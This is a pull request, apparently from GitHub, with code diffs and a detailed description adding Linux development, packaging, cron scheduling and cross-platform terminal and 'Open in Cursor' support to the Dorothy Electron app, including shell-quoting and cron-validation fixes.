+      problems+=("No C++ toolchain (missing: ${missing_toolchain[*]}) — better-sqlite3 and node-pty compile from source.")
+      apt_packages+=("build-essential")
+    fi
   fi
 
   if [ ${#problems[@]} -eq 0 ]; then
@@ -269,6 +272,11 @@ cleanup() {
 
 launch() {
   local -a command
+
+  # Installing and rebuilding can take minutes, so re-check as close to the spawn
+  # as possible: something else may have taken the port in the meantime.
+  check_port_free
+
   if [ "$WEB_MODE" -eq 1 ]; then
     command=(npm run dev)
     log "Starting browser-only mode — open http://localhost:${DEV_PORT} (Ctrl-C to stop)."

--- a/src/components/AgentWorld/GitPanel.tsx
+++ b/src/components/AgentWorld/GitPanel.tsx
@@ -228,16 +228,24 @@ export default function GitPanel({ projectPath, className = '', hideHeader = fal
     // Single-quote the path so a directory name containing $(), backticks or a
     // quote cannot break out of the command string.
     const quotedPath = `'${projectPath.replace(/'/g, "'\\''")}'`;
+    // Each branch reports which one ran: xdg-open hands a directory to the
+    // desktop's folder handler and exits 0, so a file manager opening instead of
+    // Cursor would otherwise look exactly like success.
+    const command =
+      `if command -v cursor >/dev/null 2>&1; then cursor ${quotedPath} && echo DOROTHY_OPENED=cursor; `
+      + `elif [ "$(uname)" = "Darwin" ]; then open -a "Cursor" ${quotedPath} && echo DOROTHY_OPENED=open-a; `
+      + `else xdg-open ${quotedPath} && echo DOROTHY_OPENED=xdg-open; fi`;
     try {
-      const result = await window.electronAPI.shell.exec({
-        command: `if command -v cursor >/dev/null 2>&1; then cursor ${quotedPath}; `
-          + `elif [ "$(uname)" = "Darwin" ]; then open -a "Cursor" ${quotedPath}; `
-          + `else xdg-open ${quotedPath}; fi`,
-      });
+      const result = await window.electronAPI.shell.exec({ command });
       // shell.exec resolves with success:false instead of throwing, so the catch
       // below never sees a failed command.
       if (!result?.success) {
         console.error('Failed to open in Cursor:', result?.error);
+      } else if (result.output?.includes('DOROTHY_OPENED=xdg-open')) {
+        console.warn(
+          'Cursor CLI not found — opened the project with xdg-open, which may launch a file manager '
+          + 'rather than Cursor. Install the `cursor` command from Cursor: Shell Command: Install.'
+        );
       }
     } catch (err) {
       console.error('Failed to open in Cursor:', err);

--- a/src/components/AgentWorld/GitPanel.tsx
+++ b/src/components/AgentWorld/GitPanel.tsx
@@ -220,12 +220,16 @@ export default function GitPanel({ projectPath, className = '', hideHeader = fal
     }
   }, [projectPath, onBranchChange]);
 
-  // Open project in Cursor IDE
+  // Open project in Cursor IDE. shell.exec runs this through a login shell, so the
+  // `cursor` CLI is found wherever the user's profile put it; `open -a` only exists
+  // on macOS and xdg-open is the Linux fallback when the CLI is not installed.
   const handleOpenInCursor = useCallback(async () => {
     if (!projectPath || !window.electronAPI?.shell?.exec) return;
     try {
       await window.electronAPI.shell.exec({
-        command: `open -a "Cursor" "${projectPath}"`,
+        command: `if command -v cursor >/dev/null 2>&1; then cursor "${projectPath}"; `
+          + `elif [ "$(uname)" = "Darwin" ]; then open -a "Cursor" "${projectPath}"; `
+          + `else xdg-open "${projectPath}"; fi`,
       });
     } catch (err) {
       console.error('Failed to open in Cursor:', err);

--- a/src/components/AgentWorld/GitPanel.tsx
+++ b/src/components/AgentWorld/GitPanel.tsx
@@ -225,12 +225,20 @@ export default function GitPanel({ projectPath, className = '', hideHeader = fal
   // on macOS and xdg-open is the Linux fallback when the CLI is not installed.
   const handleOpenInCursor = useCallback(async () => {
     if (!projectPath || !window.electronAPI?.shell?.exec) return;
+    // Single-quote the path so a directory name containing $(), backticks or a
+    // quote cannot break out of the command string.
+    const quotedPath = `'${projectPath.replace(/'/g, "'\\''")}'`;
     try {
-      await window.electronAPI.shell.exec({
-        command: `if command -v cursor >/dev/null 2>&1; then cursor "${projectPath}"; `
-          + `elif [ "$(uname)" = "Darwin" ]; then open -a "Cursor" "${projectPath}"; `
-          + `else xdg-open "${projectPath}"; fi`,
+      const result = await window.electronAPI.shell.exec({
+        command: `if command -v cursor >/dev/null 2>&1; then cursor ${quotedPath}; `
+          + `elif [ "$(uname)" = "Darwin" ]; then open -a "Cursor" ${quotedPath}; `
+          + `else xdg-open ${quotedPath}; fi`,
       });
+      // shell.exec resolves with success:false instead of throwing, so the catch
+      // below never sees a failed command.
+      if (!result?.success) {
+        console.error('Failed to open in Cursor:', result?.error);
+      }
     } catch (err) {
       console.error('Failed to open in Cursor:', err);
     }

--- a/src/hooks/useElectron.ts
+++ b/src/hooks/useElectron.ts
@@ -325,7 +325,13 @@ export function useElectronShell() {
     if (!isElectron()) {
       throw new Error('Electron API not available');
     }
-    return window.electronAPI!.shell.openTerminal({ cwd, command });
+    const result = await window.electronAPI!.shell.openTerminal({ cwd, command });
+    // The main process explains what it tried and what to install; without this
+    // the button would just do nothing on a machine with no terminal emulator.
+    if (!result?.success) {
+      console.error('Failed to open a terminal:', result?.error);
+    }
+    return result;
   }, []);
 
   const exec = useCallback(async (command: string, cwd?: string) => {

--- a/src/types/electron.d.ts
+++ b/src/types/electron.d.ts
@@ -553,7 +553,7 @@ export interface ElectronAPI {
 
   // Shell operations
   shell: {
-    openTerminal: (params: { cwd: string; command?: string }) => Promise<{ success: boolean }>;
+    openTerminal: (params: { cwd: string; command?: string }) => Promise<{ success: boolean; error?: string }>;
     exec: (params: { command: string; cwd?: string }) => Promise<{ success: boolean; output?: string; error?: string; code?: number }>;
     // Quick terminal PTY
     startPty?: (params: { cwd?: string; cols?: number; rows?: number }) => Promise<string>;


### PR DESCRIPTION
## Summary

Dorothy could not be developed, packaged or actually *used* on Linux. This PR covers the
whole story in one branch — it now supersedes and replaces #61, which is closed.

Three parts:

### 1. Dev launcher — `scripts/run-linux.sh` (`npm run dev:linux`)

Takes a fresh checkout to a running app in one command: prerequisite checks with the exact
`apt` line to run when something is missing, dependency install, a native-module rebuild
against the Electron ABI, then `npm run electron:dev`. Ctrl-C stops the whole stack with no
orphaned `next`/`electron` processes.

- `better-sqlite3` and `node-pty` have no prebuilt binaries for the Electron ABI, so they
  compile from source. That rebuild is slow, so it is cached behind a stamp file
  (`node_modules/.dorothy-electron-rebuild`) and only re-runs when the Electron version or
  the Node ABI changes. The stamp is dropped after any `npm install`, since installing
  restores the Node-ABI binaries.
- On Ubuntu 24.04+ (`kernel.apparmor_restrict_unprivileged_userns=1`) the kernel blocks
  unprivileged user namespaces and Electron's sandbox fails to start. The script detects
  this and exports `ELECTRON_DISABLE_SANDBOX=1`, printing what it did. Nothing changes on
  kernels without the restriction.
- Port 3000 must be free — `next dev` silently falls back to another port and the Electron
  window would then wait forever. Checked before launch.
- `--web` (browser-only), `--skip-install`, `--help`. Toolchain checks are skipped when they
  cannot matter (web-only, or `--skip-install`).

### 2. Packaging — `scripts/build-linux.sh` (`npm run electron:build:linux`)

electron-builder had no `linux` configuration and `electron:build`/`electron:pack` hardcode
`--mac`, so there was no way to produce Linux distributables. Adds **AppImage, deb, rpm and
tar.gz** (x64).

- **`build.linux`** config — targets, `category`, `icon` (the existing `public/icon-512.png`
  is already the right size), `executableName`, `maintainer`, desktop-entry keys, and deb
  runtime `depends`.
- **`scripts/build-linux.sh`** mirrors the mac build flow (move API routes aside for the
  static export, `ELECTRON_BUILD=1 next build`, `tsc -p electron/tsconfig.json`, bundle the
  seven MCP servers), then runs `electron-builder --linux`. Restores the moved sources
  through a trap on any exit path, holds an exclusive `flock` so two concurrent builds
  cannot move each other's staged sources around, and recovers sources left staged by a
  killed build instead of nesting them.
- **`electron:build:linux`** / **`electron:pack:linux`** npm scripts.
- Root `homepage` and `license` metadata — the fpm-based deb and rpm targets refuse to build
  without a homepage.

The mac build path is untouched.

### 3. Runtime fixes — the reasons Dorothy did not work on Linux even once it ran

- **Automations never fired.** `automation-handlers.ts` only ever registered a launchd job,
  guarded by `os.platform() === 'darwin'`. On Linux nothing was scheduled at all. It now
  mirrors the pattern `scheduler-handlers.ts` already uses correctly — launchd on macOS,
  crontab everywhere else — covering create, enable, disable and delete. The runner-script
  generation is shared by both paths, which also repairs `automation:run`: it executes
  `~/.dorothy/scripts/automation-<id>.sh`, a file only the launchd path used to write, so
  manual runs failed on Linux too. Crontab lines are marked `# dorothy-automation-<id>`,
  deliberately distinct from the scheduler's `# dorothy-<taskId>`, so neither removal filter
  can match the other's entries.
- **"Open in terminal" did nothing.** `shell:open-terminal` drove Terminal.app through
  `osascript` unconditionally. On non-darwin platforms it now detects an available emulator
  (`x-terminal-emulator`, `gnome-terminal`, `konsole`, `xfce4-terminal`, `alacritty`,
  `kitty`, `wezterm`, `xterm`) and launches it detached with the requested cwd and command,
  returning a clear error listing the candidates when none is installed. The working-
  directory and command flags differ per emulator, so they are specified per emulator rather
  than shared. `x-terminal-emulator` is tried first so the user's Debian alternatives choice
  wins; Debian Policy requires anything registered there to accept `-e command args...`. The
  cwd is also baked into the shell payload, not left to the spawned process's directory —
  a client/server emulator opens its window from the server's cwd, not ours.
- **"Open in Cursor" did nothing.** It ran `open -a "Cursor"`, a macOS-only command. It now
  prefers the `cursor` CLI when it is on the login shell's PATH, keeps `open -a` on macOS,
  and falls back to `xdg-open` elsewhere.

The macOS code path is unchanged in all three.

### 4. Robustness fixes from review

- **A failed terminal launch killed the app.** `spawn()` reports failure through an
  asynchronous `'error'` event rather than by throwing, so the surrounding `try/catch` never
  saw it and nothing listened for it — an unhandled `'error'` event terminates the Electron
  main process. Opening a terminal for a deleted directory (a removed git worktree) was
  enough. Now resolved as `{ success: false, error }` like any other outcome.
- **`/bin/zsh` was assumed when `SHELL` was unset.** Eight call sites fell back to zsh, which
  most Linux distributions do not ship, and an app started from a .desktop entry, an AppImage
  or a systemd user unit often has no `SHELL` — so `shell:exec` failed with ENOENT, taking
  the git panel and "open in Cursor" down with it. One `resolveShell()` helper replaces all
  eight.
- **Cron expressions reached the crontab unvalidated.** The MCP `create_automation` tool
  declares `scheduleCron` as a bare string, so a value containing a newline appended
  arbitrary extra crontab lines. `isValidCronExpression()` now rejects newlines, carriage
  returns and `%`, requires five fields, and range-checks each.
- **The port guard reported a busy port as free.** `ss | awk | grep -q` makes grep exit on
  the first match, killing awk with SIGPIPE (141); under `set -o pipefail` that became the
  pipeline's status. Exactly the failure the guard exists to prevent. Now captured and
  matched without a pipe.
- **`projectPath` was interpolated unescaped** into a shell command three times, so a
  directory name containing a quote, backtick or `$()` broke or executed. Quoted once, and
  the result is checked — `shell.exec` resolves with `{ success: false }` rather than
  rejecting, so the `catch` never ran and a failed open was silent.

### 5. Adopted from #44

[#44](https://github.com/Charlie85270/Dorothy/pull/44) (@davebulaval) covers the deb slice of
this ground and is currently conflicting with main. Three things in it are correct and were
missing here, so they are carried over with credit rather than lost:

- **EPIPE guard on stdout/stderr** (`electron/main.ts`) — no TTY behind a .desktop launch, so
  a log write can fail with EPIPE and kill the process. Verified: an unguarded write to a
  closed pipe dies with `Unhandled 'error' event ... write EPIPE`; guarded, it completes.
- **t64 dependency alternations** — Ubuntu 24.04 renamed libraries for the 64-bit `time_t`
  transition, so `libgtk-3-0` / `libatspi2.0-0` alone will not install there. Now
  `libgtk-3-0 | libgtk-3-0t64` and `libatspi2.0-0 | libatspi2.0-0t64`.
- **A CI workflow** (`.github/workflows/build-linux.yml`), widened from #44's deb-only version
  to all four targets: builds on a `v*` tag or manual dispatch, checks each artifact exists
  and exceeds 50MB, validates deb metadata and that the `dorothy` binary is present and
  non-empty, uploads artifacts and attaches them plus `latest-linux.yml` to the release.

Everything else in #44 — `after-install.sh`/`before-remove.sh` and the `--no-sandbox` desktop
entry — is deliberately not taken: electron-builder's own `postinst` already sets the
`chrome-sandbox` SUID bit conditionally, so the sandbox stays enabled where the kernel allows
it rather than being disabled outright.

### 6. Second review round

A follow-up review caught that the cron validator added above was **stricter than
cron itself** — it rejected named weekdays and months and the @-macros, so an
automation scheduled `0 9 * * MON-FRI` began failing on every enable/disable,
including on macOS where it had always worked. That regression is fixed, and the
validator is now cross-checked case-by-case against `crontab -n`: it agrees with
the real parser on all 29 test expressions while still rejecting both injection
payloads. The contract is "reject what is unsafe, plus what crontab rejects" —
deliberately nothing stricter, since being stricter is what caused the regression.

The crontab plumbing moved into `electron/utils/crontab.ts`, shared by automations
and the scheduler, which fixed four more problems at once:

- `crontab -l` failing was indistinguishable from an empty crontab, so a transient
  read error would have replaced the user's whole crontab with a single line.
- Lines were matched by substring, so removing automation `abc` also removed `abcd`.
  Matching is now on the exact `# <marker>` suffix.
- Disabling an automation deleted the runner script `automation:run` needs, so
  "Run now" then failed. Only deletion removes it.
- The automation was persisted before its job was registered, so a rejected
  schedule left it stored and enabled with nothing scheduled.

**The scheduler had the identical injection vector** and did not get the guard,
because it was applied per-caller rather than at the shared layer. It does now.
The automation id is validated too — it is interpolated into both a filename and a
crontab line, and nothing constrained it.

### 7. Remaining review findings

- **A terminal that rejects its arguments no longer looks like success.** `'spawn'`
  firing only means the binary was exec'd; an emulator that execs fine and then exits
  non-zero was reported as success, and the seven remaining candidates were never tried.
  The launcher now treats a non-zero exit as failure and falls through. Verified by
  putting a deliberately failing `x-terminal-emulator` first on PATH: it is rejected
  with `exited with code 1` and `gnome-terminal` takes over, opens, and runs the command
  in the right directory.
- **The emulator lookup stops at the first hit** instead of scanning all eight.
- **AppImage environment no longer leaks into the terminal.** `LD_LIBRARY_PATH` and
  friends point inside the AppImage mount; a terminal inheriting them loads the bundled
  libraries and breaks once the mount goes. AppRun's `<VAR>_ORIG` values are restored and
  the AppImage-only variables dropped.
- **The "no terminal emulator found" message can now reach the renderer** — `openTerminal`
  was typed `Promise<{ success: boolean }>`, so no caller could read `.error`.
- **"Open in Cursor" no longer silently opens a file manager.** `xdg-open` on a directory
  exits 0, so the fallback looked like success; each branch now reports which ran and the
  fallback warns with the command to install the `cursor` CLI.
- **Crontab failure paths are tested** — a read failing for a reason other than "no crontab
  for user", a write cron rejects, and a missing `crontab` binary.
- **Build output is excluded from lint.** Running `npm run lint` after a packaging build
  reported 8499 problems instead of 369, all from bundled third-party code under
  `release/` and `electron/dist/`.

## Tests run

Linux Mint 22 (Ubuntu 24.04 base), kernel 6.8, Node 22.17.1, Electron 33.4.11, X11, x86_64.

Run against this branch's head:

| Check | Result |
|---|---|
| `npm test` | **900 passed** (42 files) — 889 before, +11 new (automation cron path, cron-expression validation, injection regression) |
| `npx tsc -p electron/tsconfig.json --noEmit` | clean |
| `npm run lint` | 369 problems (149 errors, 220 warnings) — **identical to `origin/main`**, and no finding falls in a changed range. Lint is not green on this repo and this PR does not change that |
| `bash -n scripts/run-linux.sh` / `scripts/build-linux.sh` | OK |
| `npm run dev:linux` | window opens, `App initialization complete`, `Agent API server running on http://127.0.0.1:31415`, `Page loaded successfully`; Ctrl-C leaves no orphaned `next`/`electron` and frees ports 3000/31415 |
| `npm run electron:pack:linux` | succeeds — native modules rebuilt for Electron 33.4.11, `release/linux-unpacked/dorothy` produced, working tree left clean by the trap |

**Automation cron path, exercised against a real crontab** — driving the real compiled
`automation-handlers.js` with only `electron`'s `ipcMain` stubbed; `fs`, `child_process` and
`crontab` all real:

```
crontab -l  (before)   no crontab for andriy
create      →  {"success":true,"automationId":"cb210fcx"}
crontab -l             */15 * * * * ~/.dorothy/scripts/automation-cb210fcx.sh # dorothy-automation-cb210fcx
                       runner script written: true
disable     →  {"success":true}         crontab -l: empty
re-enable   →  {"success":true}         crontab -l: line restored
delete      →  {"success":true}         crontab -l: empty, runner script removed
crontab -l  (after)    no crontab for andriy   (test entry fully cleaned up)
```

**Review-fix reproducers** — each of these failed before the fix and passes after:

```
spawn with a deleted cwd   before: process died, "Unhandled 'error' event"
                           after : {"success":false,"error":"... spawn ENOENT"}, process survived
EPIPE on a closed stdout   before: process died, "Unhandled 'error' event ... write EPIPE"
                           after : ran to completion
port 3000 with a listener  before: raw pipeline status 141 -> reported FREE
                           after : BUSY (correctly detected); free port -> FREE; :30000 no false positive
```

**Terminal emulator path** — the handler's exact table, argv and spawn options replicated
against the two emulators installed on this host. Both opened, honoured the requested cwd
and ran the command:

```
x-terminal-emulator (-> ghostty)  ["-e","/bin/bash","-lc","cd '<tmp>' && …"]                cwd honoured: true
gnome-terminal                    ["--working-directory=<tmp>","--","/bin/bash","-lc",…]    cwd honoured: true
```

`konsole`, `xfce4-terminal`, `alacritty`, `kitty`, `wezterm` and `xterm` are not installed
here, so their flag conventions come from their documentation and **were not executed**. A
wrong flag there degrades to "the terminal does not open", not to data loss.

**Cursor fallback** — on this host (no `cursor` CLI, not macOS) the command resolves to the
`xdg-open /usr/bin/xdg-open` branch as intended. The `cursor` and `open -a` branches were not
exercised.

Carried over from the earlier packaging verification (run on commits `27e3f07`/`504ebd4` of
this branch, before the `flock`/staged-source-recovery commit — **not re-run here**):

| Check | Result |
|---|---|
| `shellcheck --shell=bash` (0.11.0) | clean, 0 findings (shellcheck is not installed on this host now) |
| `npm run electron:build:linux` | all four artifacts produced (286M AppImage, 171M deb, 171M rpm, 271M tar.gz) |
| AppImage launch | window mapped 1600×1000, full init markers |
| deb launch | unpacked `/opt/Dorothy/dorothy` starts, no sandbox errors |
| deb/rpm metadata | correct `Depends`, `Homepage`, `License: MIT`, `Maintainer`; rpm payload has binary, `.desktop` and 512×512 icon |
| desktop entry | `Categories=Development`, `StartupWMClass=Dorothy`, `Keywords`, correct `Exec` |

## Risks and things to decide

- **glibc baseline.** Built natively on Ubuntu 24.04 (glibc 2.39), so the artifacts require
  2.39+ and will not start on Ubuntu 22.04 or Debian 12. For broader compatibility the build
  should run inside `electronuserland/builder`. Documented in the README.
- **AppImage and the sandbox.** An AppImage cannot ship a SUID `chrome-sandbox`, so on
  kernels that restrict unprivileged user namespaces users may need `--no-sandbox`. The
  deb/rpm `postinst` electron-builder generates already tests for this and only sets the SUID
  bit when needed, so those two targets are fine.
- **Artifact size** — 171–286 MB, because `build.files` includes all of `node_modules/**/*`.
  The mac build has the same characteristic; trimming it is a separate change.
- **`maintainer` is a placeholder** — `Charlie85270 <charlie85270@users.noreply.github.com>`.
  deb and rpm require the `Name <email>` form; change it to whatever address you want.
- **Auto-update.** The build generates `release/latest-linux.yml`; it must be published with
  the release or the updater logs a 404.
- **arm64 is not included.** Mostly a config change, but `node-pty` would need
  cross-compilation, so it deserves its own PR with its own verification.
- **Cron registration failures now surface.** If `crontab` is missing or fails,
  `automation:create` returns `{success: false}` after the automation is already saved —
  the same shape `scheduler:createTask` has had. Reporting success for an automation that
  will never fire is the bug being fixed, so this is deliberate, but the two handlers should
  probably grow a shared rollback later.
- **Windows.** The `else` branch is cron, matching `scheduler-handlers.ts`. Neither works on
  Windows; that gap is unchanged and out of scope here.


<!-- This is an auto-generated comment: release notes by coderabbit.ai -->
## Summary by CodeRabbit

- **New Features**
  - Added Linux development and packaging workflows for AppImage, DEB, RPM, and tarball distributions.
  - Added Linux cron-based automation scheduling with validation and safe updates.
  - Improved external-terminal launching, shell compatibility, and “Open in Cursor” behavior across platforms.
  - Added automated Linux release artifact building and publishing.

- **Documentation**
  - Updated Linux setup, prerequisites, build instructions, packaging details, and auto-update requirements.
  - Updated the required Node.js version to 22.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->